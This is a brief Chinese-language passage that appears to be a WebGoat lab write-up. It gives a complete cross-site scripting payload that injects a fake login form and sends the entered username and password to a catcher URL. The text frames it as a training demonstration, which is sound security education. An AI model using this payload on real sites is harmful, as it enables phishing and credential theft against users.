最后能够成功的搜索代码为:
<form><br/><br/><HR><H3>This feature requires account login:</H3><br/><br/>Enter Username:<br/><input type="text" id="user" name="user"><br/>Enter Password:<br/><input type="password" name = "pass" id="pass"><br/><input type="submit" name="login" value="login" οnclick="var user=document.getElementById('user');var pass=document.getElementById('pass');alert('Had this been a real attack... Your credentials were just stolen. User Name = ' + user.value + 'Password = ' + pass.value);var XSSImage=new Image; XSSImage.src='http://localhost:8080/webgoat/catcher?PROPERTY=yes&user='+ user.value + '&password=' + pass.value + '';"><br/><br/><HR></form>
注意单引号和多引号的使用,以及跟本地配置相关的正确的提交地址。此为原理性描述,显然不具备实际危害。实际的攻击过程中,采用恶意链接的可能性比较大。